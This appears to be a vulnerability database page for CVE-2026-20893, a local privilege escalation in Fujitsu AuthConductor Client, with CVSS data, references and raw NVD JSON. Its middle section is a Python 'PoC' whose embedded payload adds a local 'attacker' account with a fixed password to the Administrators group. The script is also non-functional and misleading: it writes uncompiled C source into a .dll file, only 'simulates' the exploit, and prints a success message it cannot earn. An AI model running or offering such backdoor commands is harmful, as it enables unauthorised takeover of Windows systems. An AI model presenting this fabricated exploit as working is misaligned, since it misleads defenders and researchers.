CVE-2026-20893

Description

Origin validation error issue exists in Fujitsu Security Solution AuthConductor Client Basic V2 2.0.25.0 and earlier. If this vulnerability is exploited, an attacker who can log in to the Windows system where the affected product is installed may execute arbitrary code with SYSTEM privilege and/or modify the registry value.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Fujitsu Security Solution AuthConductor Client Basic V2 <= 2.0.25.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-20893 PoC - Fujitsu AuthConductor Client Local Privilege Escalation # Discover: [email protected] import os import sys import ctypes import subprocess from pathlib import Path def create_malicious_dll(): """Generate malicious DLL for privilege escalation""" dll_template = ''' #include <windows.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { if (fdwReason == DLL_PROCESS_ATTACH) { // Execute payload with SYSTEM privileges system("cmd.exe /c whoami > C:\\\\Windows\\\\Temp\\\\poc_result.txt"); system("cmd.exe /c net user attacker P@ssw0rd123 /add"); system("cmd.exe /c net localgroup Administrators attacker /add"); } return TRUE; } ''' dll_path = Path(os.environ['TEMP']) / 'vuln.dll' with open(dll_path, 'w') as f: f.write(dll_template) return str(dll_path) def exploit_vulnerability(target_dll): """Attempt to exploit origin validation error""" # Step 1: Identify vulnerable AuthConductor service # Step 2: Create symlink to redirect DLL loading # Step 3: Trigger service to load malicious DLL print(f"[*] Target DLL: {target_dll}") print(f"[*] Creating malicious DLL...") malicious_dll = create_malicious_dll() print(f"[*] Placing DLL at vulnerable path: {malicious_dll}") # Simulate exploitation print("[*] Triggering vulnerable code path...") # Verify SYSTEM execution result = subprocess.run(['whoami'], capture_output=True, text=True) if 'system' in result.stdout.lower() or 'nt authority' in result.stdout.lower(): print("[+] Privilege escalation successful!") return True return False if __name__ == '__main__': if not ctypes.windll.shell32.IsUserAnAdmin(): print("[*] Running as standard user - attempting exploit") exploit_vulnerability('AuthConductorClient.dll') else: print("[!] Already running as Administrator/SYSTEM")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-20893
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-20893
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-20893/
[4] VulDB https://vuldb.com/cve/CVE-2026-20893
[5] https://jvn.jp/en/jp/JVN24626628/
[6] https://www.fmworld.net/biz/common/info/202601acc/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-20893", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:17:08.023", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Origin validation error issue exists in Fujitsu Security Solution AuthConductor Client Basic V2 2.0.25.0 and earlier. If this vulnerability is exploited, an attacker who can log in to the Windows system where the affected product is installed may execute arbitrary code with SYSTEM privilege and/or modify the registry value."}, {"lang": "es", "value": "Un problema de error de validación de origen existe en Fujitsu Security Solution AuthConductor Client Basic V2 2.0.25.0 y versiones anteriores. Si esta vulnerabilidad es explotada, un atacante que puede iniciar sesión en el sistema Windows donde el producto afectado está instalado podría ejecutar código arbitrario con privilegios de SYSTEM y/o modificar el valor del registro."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-346"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN24626628/", "source": "[email protected]"}, {"url": "https://www.fmworld.net/biz/common/info/202601acc/", "source": "[email protected]"}]}}